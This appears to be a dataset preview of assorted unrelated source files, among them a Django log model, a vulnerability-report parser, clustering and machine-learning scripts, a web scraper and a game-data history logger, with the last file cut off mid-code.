text stringlengths 38 1.54M |
|---|
# -*- coding:utf-8 -*-
__Author__ = "KrianJ wj_19"
__Time__ = "2020/7/28 19:19"
__doc__ = """ 数据清洗用到的配置属性"""
MONGO_URI = 'localhost'
MONGO_PORT = 27017
MONGO_DB = ['china_tech', 'china_digi']
|
# coding: utf-8
from django.utils.translation import ugettext_lazy as _
from django.db import models
__all__ = ('Log', 'LOG_EXCEPTION','LOG_WARNING','LOG_NOTICE','LOG_STRING')
import datetime
LOG_EXCEPTION = 1
LOG_WARNING = 2
LOG_NOTICE = 3
LOG_STRING = 4
LOG_TYPE = (
(LOG_EXCEPTION, _('LOG_EXCEPTION')),
(LOG_WARNING, _('LOG_WARNING')),
(LOG_NOTICE, _('LOG_NOTICE')),
(LOG_STRING, _('LOG_STRING')),
)
#Log
class Log(models.Model):
#date
date = models.DateTimeField(verbose_name=_(u'date'))
#type
type = models.PositiveIntegerField(choices = LOG_TYPE, default=LOG_EXCEPTION, verbose_name=_(u'type'))
#subject
subject = models.CharField(max_length=255, verbose_name=_(u'subject'), blank=True)
#content
content = models.TextField(verbose_name=_(u'content'), blank=True)
__unicode__ = lambda self: self.subject
class Meta():
verbose_name=_(u'Log')
verbose_name_plural=_(u'Log')
ordering = ('-date',)
def save(self):
if not self.id:
self.date = datetime.datetime.today()
super(Log, self).save()
|
import sys
from .io import read_active_sites, write_clustering, write_mult_clusterings
from .cluster import cluster_by_partitioning, cluster_hierarchically, create_similarity_matrix, \
convert_indices_to_active_sites
from .compare_clusters import sum_of_distances, rand_index, benchmark_clusters, benchmark_rand, rand_versus
import pickle as pic
# Some quick stuff to make sure the program is called correctly
if len(sys.argv) < 4:
print("Usage: python -m hw2skeleton [-P| -H] <pdb directory> <output file>")
sys.exit(0)
active_sites = read_active_sites(sys.argv[2])
sim_matrix = create_similarity_matrix(active_sites, "hydrophobicity")
pic.dump(sim_matrix, open("sim_matrix.pkl", "wb"))
#sim_matrix = pic.load(open("sim_matrix.pkl", "rb"))
# Choose clustering algorithm
if sys.argv[1][0:3] == "-PC":
print("Benchmarking Partitioning Algorithm")
rmsd_ssds = benchmark_clusters(active_sites, alg="P", metric="RMSD", N=1000)
hyd_ssds = benchmark_clusters(active_sites, alg="P", metric="hydrophobicity", N=1000)
pic.dump(rmsd_ssds, open("kmeans_rmsd_ssds.pkl", "wb"))
pic.dump(hyd_ssds, open("kmeans_hyd_ssds.pkl", "wb"))
if sys.argv[1][0:3] == "-HC":
print("Benchmarking Hierarchical Algorithm")
rmsd_ssds = benchmark_clusters(active_sites, alg="H", metric="RMSD", N=50)
hyd_ssds = benchmark_clusters(active_sites, alg="H", metric="hydrophobicity", N=50)
pic.dump(rmsd_ssds, open("kmeans_rmsd_ssds.pkl", "wb"))
pic.dump(hyd_ssds, open("kmeans_hyd_ssds.pkl", "wb"))
if sys.argv[1][0:3] == "-PR":
print("Computing Average Rand Index, K-means")
rmsd_rand = benchmark_rand(active_sites, alg="P", metric="RMSD", N=30, step=10)
hyd_rand = benchmark_rand(active_sites, alg="P", metric="hydrophobicity", N=30, step=10)
pic.dump(rmsd_rand, open("kmeans_rmsd_rand.pkl", "wb"))
pic.dump(hyd_rand, open("kmeans_hyd_rand.pkl", "wb"))
if sys.argv[1][0:2] == '-P':
print("Clustering using Partitioning method")
assignments = cluster_by_partitioning(active_sites, sim_matrix)
clustering = convert_indices_to_active_sites(assignments, active_sites)
write_clustering(sys.argv[3], clustering)
if sys.argv[1][0:2] == '-H':
print("Clustering using hierarchical method")
assignments = cluster_hierarchically(active_sites, sim_matrix)
clusterings = convert_indices_to_active_sites(assignments, active_sites)
write_clustering(sys.argv[3], clusterings)
if sys.argv[1][0:2] == "-C":
print("Comparing Kmeans to Hierarchical")
hyd_rand = rand_versus(active_sites, N=20, metric="hydrophobicity")
rmsd_rand = rand_versus(active_sites, N=20, metric="RMSD")
pic.dump(rmsd_rand, open("compare_rmsd_rand.pkl", "wb"))
pic.dump(hyd_rand, open("compare_hyd_rand.pkl", "wb"))
|
{
"targets": [
{
"target_name": "structure",
"sources": [ "src/structure.cc" ]
}
]
} |
import json
import logging
import urllib
from dojo.models import Finding
logger = logging.getLogger(__name__)
class SafetyParser(object):
def __init__(self, json_output, test):
# Grab Safety DB for CVE lookup
url = "https://raw.githubusercontent.com/pyupio/safety-db/master/data/insecure_full.json"
try:
response = urllib.request.urlopen(url)
safety_db = json.loads(response.read().decode('utf-8'))
except urllib.error.URLError as e:
logger.warn("Error Message: %s", e)
logger.warn("Could not resolve %s. Fallback is using the offline version from dojo/tools/safety/insecure_full.json.", url)
with open("dojo/tools/safety/insecure_full.json", "r") as f:
safety_db = json.load(f)
f.close()
tree = self.parse_json(json_output)
if tree:
self.items = [data for data in self.get_items(tree, test, safety_db)]
else:
self.items = []
def parse_json(self, json_output):
data = json_output.read() or '[]'
try:
json_obj = json.loads(str(data, 'utf-8'))
except:
json_obj = json.loads(data)
tree = {l[4]: {'package': str(l[0]),
'affected': str(l[1]),
'installed': str(l[2]),
'description': str(l[3]),
'id': str(l[4])}
for l in json_obj} # noqa: E741
return tree
def get_items(self, tree, test, safety_db):
items = {}
for key, node in tree.items():
item = get_item(node, test, safety_db)
items[key] = item
return list(items.values())
def get_item(item_node, test, safety_db):
severity = 'Info' # Because Safety doesn't include severity rating
cve = ''.join(a['cve'] or ''
for a in safety_db[item_node['package']]
if a['id'] == 'pyup.io-' + item_node['id']) or None
title = item_node['package'] + " (" + item_node['affected'] + ")"
finding = Finding(title=title + " | " + cve if cve else title,
test=test,
severity=severity,
description=item_node['description'] +
"\n Vulnerable Package: " + item_node['package'] +
"\n Installed Version: " + item_node['installed'] +
"\n Vulnerable Versions: " + item_node['affected'] +
"\n CVE: " + (cve or "N/A") +
"\n ID: " + item_node['id'],
cve=cve,
cwe=1035, # Vulnerable Third Party Component
mitigation="No mitigation provided",
references="No reference provided",
active=False,
verified=False,
false_p=False,
duplicate=False,
out_of_scope=False,
mitigated=None,
impact="No impact provided")
return finding
|
import textwrap
from xmldoc.renderer import Renderer
class MarkdownRenderer(Renderer):
width = 80
def wrap(self, text):
return textwrap.fill(text, self.width)
def header(self, element):
level = int(element.tag[1]) + 1
title = self.inline(element)
return self.wrap(("#" * level) + " " + title) + "\n\n"
def paragraph_wrap(self, element, width):
text = textwrap.fill(self.inline(element), width)
align = element.get("align", "left")
if align == "right":
lines = text.split("\n")
lines = ["{0:>{1}}".format(line, self.width) for line in lines]
return "\n".join(lines) + "\n\n"
elif align == "center":
lines = text.split("\n")
lines = [line.center(self.width) for line in lines]
return "\n".join(lines) + "\n\n"
else:
return text + "\n\n"
def paragraph(self, element):
return self.paragraph_wrap(element, self.width) + "\n\n"
def blockquote(self, element):
output = ""
for child_element in element:
output += self.paragraph(child_element) + "\n\n"
output = output.rstrip()
return "> " + output.replace("\n", "\n> ") + "\n\n"
def ordered_list(self, element):
return "[<ol> not supported]\n\n"
def unordered_list(self, element):
return "[<ul> not supported]\n\n"
def table(self, element):
return "[<table> not supported]\n\n"
def text(self, text):
return text.replace("*", "\\*")
def linebreak(self, text):
return "<br/>"
def bold(self, text):
return "**{}**".format(text)
def italic(self, text):
return "*{}*".format(text)
def superscript(self, text):
return "^({})".format(text)
def subscript(self, text):
return "_({})".format(text)
def highlight(self, text):
return "<mark>{}</mark>".format(text)
Renderer.register(MarkdownRenderer)
class MarkdownExporter:
@staticmethod
def run(document):
output = document.manifest['title'] + "\n"
output += "=" * max(5, len(document.manifest['title'])) + "\n\n"
renderer = MarkdownRenderer()
output += renderer.run(document.root)
return output
|
import pandas as pd
import numpy as np
import seaborn as sn
import matplotlib.pyplot as plt
import time
dataset = pd.read_csv('new_appdata10.csv')
## Data Preprocessing
response = dataset["enrolled"]
dataset = dataset.drop(columns = 'enrolled')
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(dataset, response,
test_size = 0.2,
random_state = 0)
train_identifier = X_train['user']
X_train = X_train.drop(columns = 'user')
test_identifier = X_test['user']
X_test = X_test.drop(columns = 'user')
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train2 = pd.DataFrame(sc_X.fit_transform(X_train))
X_test2 = pd.DataFrame(sc_X.transform(X_test))
X_train2.columns = X_train.columns.values
X_test2.columns = X_test.columns.values
X_train2 .index = X_train.index.values
X_test2 .index = X_test.index.values
X_train = X_train2
X_test = X_test2
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state = 0, penalty = 'l1')
classifier.fit(X_train, Y_train)
y_pred = classifier.predict(X_test)
from sklearn.metrics import confusion_matrix, accuracy_score, f1_score, precision_score, recall_score
cm = confusion_matrix(Y_test, y_pred)
accuracy = accuracy_score(Y_test, y_pred)
precision = precision_score(Y_test, y_pred)
recall = recall_score(Y_test, y_pred)
f1 = f1_score(Y_test, y_pred)
df_cm = pd.DataFrame(cm, index = (0,1), columns = (0,1))
Confusion_Figure = plt.figure(figsize = (10,7))
sn.set(font_scale = 1.5)
sn.heatmap(df_cm, annot=True, fmt='g')
from sklearn.model_selection import cross_val_score
accuracies = cross_val_score(estimator = classifier, X= X_train, y= Y_train, cv = 10)
print("Logistic Accuracy: ", (accuracies.mean()), (accuracies.std() * 2))
# Formatting the Final Results
final_results = pd.concat([Y_test,test_identifier], axis = 1).dropna()
final_results['predicted_results'] = y_pred
final_results = final_results[['user', 'enrolled', 'predicted_results']].reset_index(drop=True)
final_results.to_csv('Final Results.csv', index = True)
|
from lxml import etree
import requests
import re
url = "http://www.dxy.cn/bbs/thread/626626#626626"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36'
}
#获取url的html
res = requests.get(url,headers)
#用lxml解析html
html = etree.HTML(res.text,etree.HTMLParser())
#利用Xpath表达式获取user和content
user = html.xpath('//*/table/tbody/tr/td[1]/div[2]/a')
#user = tree.xpath('//*[@id="post_2"]/table/tbody/tr/td[1]/div[2]/a')
#content = html.xpath('//*/table/tbody/tr/td[2]/div[2]/*/table/tbody/tr/td/text()')
content = html.xpath('//*/table/tbody/tr/td[2]/div[2]/*/table/tbody/tr/td')
#选对标签,上面选到text(),应该选到上一级标签;
#for x in range(0,len(content)):
#print(content[x].xpath('string(.)'))
#//*[@id="post_2"]/table/tbody/tr/td[2]/div[2]/div[1]/table/tbody/tr/td/br[1]
#//*[@id="post_2"]/table/tbody/tr/td[2]/div[2]/div[1]/table/tbody/tr/td/text()[2]
#//*[@id="post_3"]/table/tbody/tr/td[2]/div[2]/div[1]/table/tbody/tr/td/text()[2]
#//*[@id="post_2"]/table/tbody/tr/td[2]/div[2]/div[1]/table/tbody/tr/td/a
lis = []
for i,ur,ct in zip(range(0,len(user)),user,content):
print("user_"+str(i+1),user[i].text.strip(),content[i].xpath('string(.)').strip())
print(100*"*")
|
#!/usr/bin/env python3
import sys
import os
import json
import sqlite3
import csvloader
import starlight
import models
from collections import namedtuple, defaultdict
import locale
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
QUERY_GET_EVENT_STUBS = "SELECT id, name, type, event_start, event_end FROM event_data"
QUERY_GET_REWARDS_FOR_EVENT = "SELECT reward_id FROM event_available WHERE event_id = ? ORDER BY recommend_order"
QUERY_GET_NORMAL_GACHAS = """SELECT gacha_data.id, gacha_data.name, start_date, end_date, type, type_detail,
gacha_rate.rare_ratio, gacha_rate.sr_ratio, gacha_rate.ssr_ratio
FROM gacha_data LEFT JOIN gacha_rate USING (id) WHERE type = 3 AND type_detail = 1"""
QUERY_GET_GACHA_REWARD_META = """SELECT reward_id, limited_flag, recommend_order
FROM gacha_available WHERE gacha_id = ? AND recommend_order != 0
ORDER BY recommend_order"""
QUERY_GET_GACHA_REWARD_META_V2 = """SELECT card_id, limited_flag, recommend_order
FROM gacha_available_2 WHERE gacha_id = ? ORDER BY recommend_order"""
QUERY_GET_ROOTS = "SELECT id FROM card_data WHERE evolution_id != 0"
QUERY_GET_STORY_START_DATES = """SELECT card_data.id, start_date FROM card_data
LEFT JOIN story_detail ON (open_story_id == story_detail.id)
WHERE card_data.id IN ({0})"""
QUERY_FIND_CONTAINING_GACHA = "SELECT DISTINCT gacha_id FROM gacha_available WHERE reward_id = ? AND gacha_id IN ({0})"
QUERY_FIND_CONTAINING_GACHA_V2 = "SELECT DISTINCT gacha_id FROM gacha_available_2 WHERE card_id = ? AND gacha_id IN ({0})"
# ----------------------------------------------------------------
# Reward list generators for specific event types ----------------
def merge(groups):
l = []
for g in groups.values():
[l.append(card) for card in g if card not in l]
return l
def get_atapon_evt_rewards(sql, event_id):
t = {
"progression": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM atapon_point_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_point", (event_id,))],
"ranking": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM atapon_point_rank_reward WHERE reward_type = 6 AND event_id = ? ORDER BY rank_max DESC", (event_id,))],
}
t["event"] = merge(t)
return t
def get_groove_evt_rewards(sql, event_id):
t = {
"progression": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM medley_point_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_point", (event_id,))],
"ranking": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM medley_point_rank_reward WHERE reward_type = 6 AND event_id = ? ORDER BY rank_max DESC", (event_id,))],
}
t["event"] = merge(t)
return t
def get_party_evt_rewards(sql, event_id):
t = {
"progression": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM party_point_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_point", (event_id,))],
}
t["event"] = t["progression"]
return t
def get_parade_evt_rewards(sql, event_id):
t = {
"audience": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM tour_audience_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_audience", (event_id,))],
"progression": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM tour_point_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_point", (event_id,))],
}
t["event"] = merge(t)
return t
def get_carnival_evt_rewards(sql, event_id):
t = {
"gacha": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM box_carnival_{0} WHERE reward_type = 6 ORDER BY step_id".format(event_id))],
}
t["event"] = t["gacha"]
return t
def get_tower_evt_rewards(sql, event_id):
t = {
"progression": [k for k, in sql.execute("SELECT DISTINCT reward_id FROM tower_total_point_reward WHERE reward_type = 6 AND event_id = ? ORDER BY need_point", (event_id,))],
}
t["event"] = t["progression"]
return t
EVENT_REWARD_SPECIALIZATIONS = {
0: get_atapon_evt_rewards,
# 1: get_caravan_evt_rewards, # Doesn't seem to exist.
2: get_groove_evt_rewards,
3: get_party_evt_rewards,
4: get_parade_evt_rewards,
# 5: get_bus_evt_rewards, # another really nasty one
6: get_carnival_evt_rewards,
7: get_tower_evt_rewards,
}
# ----------------------------------------------------------------
ea_overrides = list(csvloader.load_db_file(starlight.private_data_path("event_availability_overrides.csv")))
overridden_events = set(x.event_id for x in ea_overrides)
def htype(x):
return (x & 0xF0000000) >> 28
def internal_id(x):
return x & 0x0FFFFFFF
def get_overridden(event_id):
for k, v in ea_overrides:
if k == event_id:
yield v
def prime_from_cursor(typename, cursor, **kwargs):
keys = list(kwargs.keys())
fields = [x[0] for x in cursor.description]
raw_field_len = len(fields)
the_raw_type = namedtuple("_" + typename, fields)
for key in keys:
fields.append(key)
the_type = namedtuple(typename, fields)
for val_list in cursor:
temp_obj = the_raw_type(*map(csvloader.clean_value, val_list))
try:
extvalues = tuple(kwargs[key](temp_obj) for key in keys)
except Exception:
raise RuntimeError(
"Uncaught exception while filling stage2 data for {0}. Are you missing data?".format(temp_obj))
yield the_type(*temp_obj + extvalues)
def log_events(have_logged, seen, local, remote):
# map: event id -> event_stub_t
events = {k[0]: k
for k in prime_from_cursor("event_stub_t",
local.execute(QUERY_GET_EVENT_STUBS))
}
# generate a set of all event ids with the type bitfield set correctly
event_h_ids = set(map(lambda x: (models.HISTORY_TYPE_EVENT << 28) | (x & 0x0FFFFFFF), events))
# xor the top 4 bits (i.e., the history type id) of each descriptor by 7,
# which just turns the 2 (HISTORY_TYPE_EVENT) to a 5 (HISTORY_TYPE_EVENT_END).
event_end_h_ids = set(map(lambda x: x ^ 0x70000000, event_h_ids))
need_to_add = (event_h_ids | event_end_h_ids) - have_logged
def from_event_available(sql, event_id):
return {"event": [k for k, in sql.execute(QUERY_GET_REWARDS_FOR_EVENT, (event_id,)).fetchall()]}
def ge_cards(event_id, type_info):
queryer = EVENT_REWARD_SPECIALIZATIONS.get(type_info & 0xFF, from_event_available)
if event_id in overridden_events:
groups = { "event": list(get_overridden(event_id))}
else:
groups = queryer(local, event_id)
if not groups.get("event", []):
if "event" not in groups:
print("error: specialization didn't return an event list. this will cause UI problems")
print("warning: specialization returned no data for", event_id, "trying generic")
groups = from_event_available(local, event_id)
for rl in groups.values():
seen.update(rl)
return groups
def eti(event_id):
base = (events[event_id].type - 1) & 0xFF
# TODO figure out where to get token attribute/medley focus...
return base
with remote as s:
# add event markers
for desc in event_h_ids - have_logged:
if starlight.JST(events[internal_id(desc)].event_start).year >= 2099:
continue
cats = ge_cards(internal_id(desc), eti(internal_id(desc)))
s.add(models.HistoryEventEntry(
descriptor=desc,
extra_type_info=eti(internal_id(desc)),
added_cards=json.dumps(cats),
event_name=events[internal_id(desc)].name,
start_time=starlight.JST(events[internal_id(desc)].event_start).timestamp(),
end_time=starlight.JST(events[internal_id(desc)].event_end).timestamp()
))
seen = set()
for cid in cats.get("progression", []):
s.merge(models.EventLookupEntry(card_id=cid, event_id=internal_id(desc), acquisition_type=1))
seen.add(cid)
for cid in cats.get("ranking", []):
s.merge(models.EventLookupEntry(card_id=cid, event_id=internal_id(desc), acquisition_type=2))
seen.add(cid)
for cid in cats.get("gacha", []):
s.merge(models.EventLookupEntry(card_id=cid, event_id=internal_id(desc), acquisition_type=3))
seen.add(cid)
for cid in cats.get("event", []):
if cid not in seen:
s.merge(models.EventLookupEntry(card_id=cid, event_id=internal_id(desc), acquisition_type=0))
# add event end markers
# for desc in event_end_h_ids - have_logged:
# s.add(models.HistoryEventEntry(
# descriptor=desc,
# extra_type_info=0,
# added_cards=None,
# event_name=events[internal_id(desc)].name,
#
# start_time=starlight.JST(events[internal_id(desc)].event_end).timestamp(),
# end_time=0
# ))
s.commit()
def update_add_set(s, gacha, add_set):
for flag, key in enumerate(("other", "limited")):
for c in add_set.get(key, []):
row = s.query(models.GachaLookupEntry).filter(
models.GachaLookupEntry.card_id == c
and models.GachaLookupEntry.is_limited == flag).all()
if row:
row[0].last_gacha_id = gacha.id
row[0].last_available = starlight.JST(gacha.end_date).timestamp()
s.add(row[0])
else:
s.add(models.GachaLookupEntry(
card_id=c,
first_gacha_id=gacha.id,
last_gacha_id=gacha.id,
first_available=starlight.JST(gacha.start_date).timestamp(),
last_available=starlight.JST(gacha.end_date).timestamp(),
is_limited=flag
))
def log_gachas(have_logged, seen, seen_in_gacha, local, remote):
# code sucks
# TODO clean up and refactor everything after this line
have_gacha_set = set( map( lambda x: internal_id(x),
filter(lambda x: htype(x) == 3, have_logged) ) )
# map: gacha id -> gacha_stub_t
gachas = {k[0]: k for k in prime_from_cursor("gacha_stub_t", local.execute(QUERY_GET_NORMAL_GACHAS))}
# { gacha id -> { "limited": [], "other": [] ... } }
add_sets = {k: defaultdict(lambda: []) for k in gachas}
new_gachas = set(gachas.keys()) - have_gacha_set
gachas_in_chrono_order = sorted(new_gachas, key=lambda x: starlight.JST(gachas[x].start_date))
orphans = set(k for k, in local.execute(QUERY_GET_ROOTS).fetchall()) - seen_in_gacha
is_limited = {}
# check limited/featured
for gid in new_gachas:
keys = {}
my_add_set = add_sets[gid]
query_v2 = local.execute(QUERY_GET_GACHA_REWARD_META_V2, (gid,)).fetchall()
if not query_v2:
query_v2 = local.execute(QUERY_GET_GACHA_REWARD_META, (gid,)).fetchall()
for a_card, lim_flag, order in query_v2:
my_add_set["limited" if lim_flag else "other"].append(a_card)
seen.add(a_card)
seen_in_gacha.add(a_card)
try:
orphans.remove(a_card)
except KeyError:
pass
keys[a_card] = order
if lim_flag:
# mark the gacha as limited
is_limited[gid] = 1
# now sort the add set
if "limited" in my_add_set:
my_add_set["limited"].sort(key=keys.get)
if "other" in my_add_set:
my_add_set["other"].sort(key=keys.get)
gspec = ",".join(map(str, new_gachas))
for orphan in orphans:
havers = [k for k, in local.execute(QUERY_FIND_CONTAINING_GACHA_V2.format(gspec), (orphan,))]
if not havers:
havers = [k for k, in local.execute(QUERY_FIND_CONTAINING_GACHA.format(gspec), (orphan,))]
for gid in gachas_in_chrono_order:
if gid in havers:
break
else:
# print("orphan:", orphan)
continue
seen.add(orphan)
seen_in_gacha.add(orphan)
add_sets[gid]["other"].append(orphan)
with remote as s:
for gid in new_gachas:
update_add_set(s, gachas[gid], add_sets[gid])
s.add(models.HistoryEventEntry(
descriptor=gid | (models.HISTORY_TYPE_GACHA << 28),
extra_type_info=is_limited.get(gid, 0),
added_cards=json.dumps(add_sets[gid]) if add_sets[gid] else None,
event_name=gachas[gid].name,
start_time=starlight.JST(gachas[gid].start_date).timestamp(),
end_time=starlight.JST(gachas[gid].end_date).timestamp()
))
s.commit()
def log_lastresort(have_logged, seen, local, remote):
orphans = set(k for k, in local.execute(QUERY_GET_ROOTS).fetchall()) - seen
buckets = defaultdict(lambda: [])
spec = ",".join(map(str, orphans))
for card, datestr in local.execute(QUERY_GET_STORY_START_DATES.format(spec)):
if not datestr:
continue
buckets[starlight.JST(datestr).timestamp()].append(card)
seen.add(card)
with remote as s:
for time in buckets:
# hours since the epoch, hopefully will last us long enough lul
primary_key = int(time / (60 * 60))
s.add(models.HistoryEventEntry(
descriptor=primary_key | (models.HISTORY_TYPE_ADD_N << 28),
extra_type_info=0,
added_cards=json.dumps({ "new": buckets[time] }),
event_name=None,
start_time=time,
end_time=0,
))
s.commit()
def main(new_db):
local = sqlite3.connect(new_db)
remote = models.TranslationSQL()
seen = set()
seen_in_gacha = set()
have_logged = set()
with remote as s:
raw = s.query(models.HistoryEventEntry.descriptor, models.HistoryEventEntry.added_cards).all()
for descriptor, payload in raw:
have_logged.add(descriptor)
if not payload:
continue
for each_list in json.loads(payload).values():
seen.update(each_list)
if htype(descriptor) == models.HISTORY_TYPE_GACHA:
for each_list in json.loads(payload).values():
seen_in_gacha.update(each_list)
log_events(have_logged, seen, local, remote)
log_gachas(have_logged, seen, seen_in_gacha, local, remote)
log_lastresort(have_logged, seen, local, remote)
print("final orphaned set:", set(k for k, in local.execute(QUERY_GET_ROOTS).fetchall()) - seen)
print("if the above set isn't empty, file a bug because i missed something")
if __name__ == '__main__':
main(*sys.argv[1:])
|
'''文件操作
r读取操作,文件不存在抛异常
w写操作,文件不存在创建,文件存在就覆盖
a写操作,文件不存在创建,文件内容存在就追加
rb以二进制方式打开文件,即序列化
wb
ab
r+读写操作,写与读不分先后,即随时都可进行读与写,写是追加
w+读写操作,文件不存在创建,存在覆盖,先写后读。保证文件有内容通过移动光标来读自己想要的部分。
a+读写操作,文件不存在创建,存在就追加,任意时刻读写,若刚用‘a+’打开一个文件,则不能立即读,因为此时光标已经是文件末尾,除非你把光标移动到初始位置或任意非末尾的位置。
文件的定位读写
'''
with open("C://software//readme.txt","a+",encoding = "utf-8") as file:
file.seek(0)
s = file.readline()
print(s)
file.write("abcd")
# f = open("C://software//python//test.txt","w")
# f.write("abcd")
# # f.close()
#
# f = open("C://software//python//test.txt","r")
# content = f.read()
# content1 = f.readline()#只读一行,从上一次读取的指针位置开始读取
# content2 = f.readLines();
# for i in content2:
# print(i)
# f.close()
#
#
#
# f = open("C://software//python//test.txt","a+")
#
# content = f.readline()
# f.tell()#获取当前指针的位置
# print(f.tell())
# f.seek(5,0)#0,文件开头,1-当前位置,2-文件结尾(偏移量应该为负数),偏移位置为5,设置文件操作的指针位置
# print(f.readline())
|
#!/usr/bin/env python
import sys
import argparse
import os.path
import os
import numpy as np
import libtiff as lt
from libtiff import TIFF
from glob import glob
from cvtools import readFlo
import cv2
import matplotlib.pyplot as plt
import scipy
import pylab
import scipy.cluster.hierarchy as sch
def main():
usage = """deepflow_simmatrix.py [input_dir]
Expects refframes directory in [input_dir] to be already filled with i-frames
Example:
./deepflow_simmatrix_viz.py ./simmatrix/20160412/
For help:
./deepflow_simmatrix_viz.py -h
Ben Lansdell
01/04/2016
"""
parser = argparse.ArgumentParser()
parser.add_argument('path_in', help='input directory with frames already placed in it')
args = parser.parse_args()
#Test code
class Args:
pass
args = Args()
args.path_in = './simmatrix/20160412/'
#Get all files in
iframes = sorted(glob(args.path_in + 'refframes/*.tif'))
nF = len(iframes)
nx_tile = 64
#Load images
images = []
for fn_in in iframes: # do stuff with image
# to open a tiff file for reading:
tif = TIFF.open(fn_in, mode='r')
image = tif.read_image()
image = cv2.resize(image, (nx_tile, nx_tile))
images.append(image)
tif.close()
D = np.zeros((nF,nF))
#Run DeepFlow
for i in range(nF):
im1 = iframes[i]
fn1 = int(os.path.splitext(os.path.basename(im1))[0].split('_')[1])
for j in range(i+1,nF):
im2 = iframes[j]
fn2 = int(os.path.splitext(os.path.basename(im2))[0].split('_')[1])
print("DeepFlow between frame %d and %d" %(fn1, fn2))
flow_in1 = args.path_in + 'corrmatrix/%04d_%04d.flo'%(fn1,fn2)
flow_in2 = args.path_in + 'corrmatrix/%04d_%04d.flo'%(fn2,fn1)
#Read in flow
flow1 = readFlo(flow_in1)
flow2 = readFlo(flow_in2)
ny,nx = flow1.shape[0:2]
#For each run we compute the average reconstruction error
fwdmeshy, fwdmeshx = [a.astype(np.float32) for a in np.meshgrid(np.arange(nx), np.arange(ny))]
#Perturb mesh grid by forward flow
#Round to integers
fwdx = fwdmeshx + np.ceil(flow1[:,:,0])
fwdy = fwdmeshy + np.ceil(flow1[:,:,1])
fwdx = np.maximum(0, np.minimum(nx-1, fwdx))
fwdy = np.maximum(0, np.minimum(nx-1, fwdy))
#Look up flow field using this perturbed map
fwdremapx = fwdx + flow2[fwdx.astype(int),fwdy.astype(int),0]
fwdremapy = fwdy + flow2[fwdx.astype(int),fwdy.astype(int),1]
fwdremapx -= fwdmeshx
fwdremapy -= fwdmeshy
fwderr = np.sqrt(fwdremapx**2 + fwdremapy**2)
#fwdtracked = fwderr < threshold
D[i,j] = np.mean(fwderr)
D[j,i] = D[i,j]
# Plot distance matrix.
fig1 = pylab.figure(figsize=(8,8))
axmatrix1 = fig1.add_axes([0.3,0.1,0.6,0.6])
im = axmatrix1.matshow(D, aspect='auto', origin='lower', cmap=pylab.cm.YlGnBu)
fn_out = args.path_in + 'similarity.png'
fig1.savefig(fn_out)
#Once we've loaded this data we view the similarity matrix
fig = pylab.figure(figsize=(8,8))
ax1 = fig.add_axes([0.09,0.1,0.2,0.6])
Y = sch.linkage(D, method='centroid')
Z1 = sch.dendrogram(Y, orientation='right')
ax1.set_xticks([])
ax1.set_yticks([])
# Compute and plot second dendrogram.
ax2 = fig.add_axes([0.3,0.71,0.6,0.2])
Y = sch.linkage(D, method='single')
Z2 = sch.dendrogram(Y)
ax2.set_xticks([])
ax2.set_yticks([])
# Plot distance matrix.
axmatrix = fig.add_axes([0.3,0.1,0.6,0.6])
idx1 = Z1['leaves']
idx2 = Z2['leaves']
D = D[idx1,:]
D = D[:,idx2]
im = axmatrix.matshow(D, aspect='auto', origin='lower', cmap=pylab.cm.YlGnBu)
axmatrix.set_xticks([])
axmatrix.set_yticks([])
# Plot colorbar.
axcolor = fig.add_axes([0.91,0.1,0.02,0.6])
pylab.colorbar(im, cax=axcolor)
#fig.show()
fn_out = args.path_in + 'dendrogram.png'
fig.savefig(fn_out)
#Make another version of this plot but bigger and with frame snippets
#Load all the iframe images and resize
fn_out_d1 = args.path_in + 'dend_d1_tile.png'
fn_out_d2 = args.path_in + 'dend_d2_tile.png'
im_d1 = images[idx1[0]]
im_d2 = images[idx2[0]]
for idx in range(1,nF):
im_d1 = np.hstack((im_d1, images[idx1[idx]]))
im_d2 = np.hstack((im_d2, images[idx2[idx]]))
cv2.imwrite(fn_out_d1,im_d1)
cv2.imwrite(fn_out_d2,im_d2)
if __name__ == "__main__":
sys.exit(main()) |
__author__ = "Vini Salazar"
__license__ = "MIT"
__maintainer__ = "Vini Salazar"
__url__ = "https://github.com/vinisalazar/bioprov"
__version__ = "0.1.24"
__doc__ = """
Module for holding preset instances of the Program class.
"""
from os import path
from pathlib import Path
from bioprov import File, config
from bioprov.src.main import Parameter, PresetProgram, Program
from bioprov.utils import Warnings, assert_tax_rank
def diamond(blast_type, sample, db, query_tag="query", outformat=6, extra_flags=None):
"""
:param str blast_type: Which aligner to use ('blastp' or 'blastx').
:param Sample sample: Instance of BioProv.Sample.
:param str db: A string pointing to the reference database path.
:param str query_tag: A tag for the query file.
:param int outformat: The output format to gather from diamond (0, 5 or 6).
:param list extra_flags: A list of extra parameters to pass to diamond
(e.g. --sensitive or --log).
:return: Instance of PresetProgram containing Diamond.
:rtype: BioProv.PresetProgram.
"""
_diamond = PresetProgram(
name="diamond",
params=(
Parameter(key=blast_type),
Parameter(key="--db", value=db),
Parameter(key="--outfmt", value=outformat),
),
sample=sample,
input_files={"--query": query_tag},
output_files={"--out": ("_dmnd_hits", "_dmnd_hits.tsv")},
extra_flags=extra_flags,
)
return _diamond
def prodigal(sample=None, input_tag="assembly", extra_flags=None):
"""
:param sample: Instance of BioProv.Sample.
:param input_tag: Instance of BioProv.Sample.
:param list extra_flags: A list of extra parameters to pass to Prodigal.
:return: Instance of PresetProgram containing Prodigal.
"""
_prodigal = PresetProgram(
name="prodigal",
sample=sample,
input_files={"-i": input_tag},
output_files={
